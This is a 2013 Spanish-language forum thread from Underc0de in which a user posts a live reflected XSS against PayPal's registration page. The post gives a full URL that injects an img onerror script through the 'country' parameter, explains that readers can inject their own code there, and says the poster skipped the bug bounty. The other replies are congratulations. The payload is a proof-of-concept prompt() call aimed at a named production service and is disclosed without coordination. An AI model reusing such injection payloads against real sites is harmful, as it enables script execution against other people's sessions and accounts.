Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Pr0ph3t en Mayo 28, 2013, 04:48:27 PM

Título: Paypal Live XSS by Pr0ph3t
Publicado por: Pr0ph3t en Mayo 28, 2013, 04:48:27 PM
Os dejo mi segundo XSS en Paypal, como nunca pagan, paso de participar en el bug bounty.

(http://i.snag.gy/mK2DR.jpg)

https://registration.paypal.com/?mode=try&partner=Shopify&country=%22%3E%3Cimg%20src=x%20onerror=prompt%28/Pr0ph3t/%29;%3E

Sólo teneis que pulsar en Continuar y se ejecutará el código que inyectéis en la variable country.

Un saludo.
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: l Sys7eMr00t l en Mayo 28, 2013, 05:01:55 PM
Interesante, no soy muy fan de los XSS o mejor dicho, no tengo conocimiento de como explotarlos.
Pero te felicito, por el esfuerzo y por compartirlo.
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: ANTRAX en Mayo 28, 2013, 05:08:49 PM
Buenisima pr0ph3t!! faltó la imagen!
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: Pr0ph3t en Mayo 28, 2013, 05:35:26 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenisima pr0ph3t!! faltó la imagen!
Añadida.
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: maxlife en Mayo 28, 2013, 05:59:16 PM
jajaa buena
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: ZanGetsu en Mayo 28, 2013, 06:10:28 PM
muy bueno, gracias
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: mr.blood en Mayo 28, 2013, 06:44:22 PM
Cada día me da más confianza este "banco"...

Gracias por la información Pr0ph3t.

Sa1uDoS
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: ANTRAX en Mayo 29, 2013, 09:19:47 AM
Ahi aparecio otro mas: http://www.mdzol.com/nota/467725-hacker-descubre-vulnerabilidad-en-paypal/
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: morodog en Mayo 29, 2013, 09:53:37 AM
Proph3t congratz!!!
Título: Re:Paypal Live XSS by Pr0ph3t
Publicado por: S t Ø r M d ∆ r k en Mayo 29, 2013, 07:50:09 PM
Wow excelente Proph3t, un saludo!!.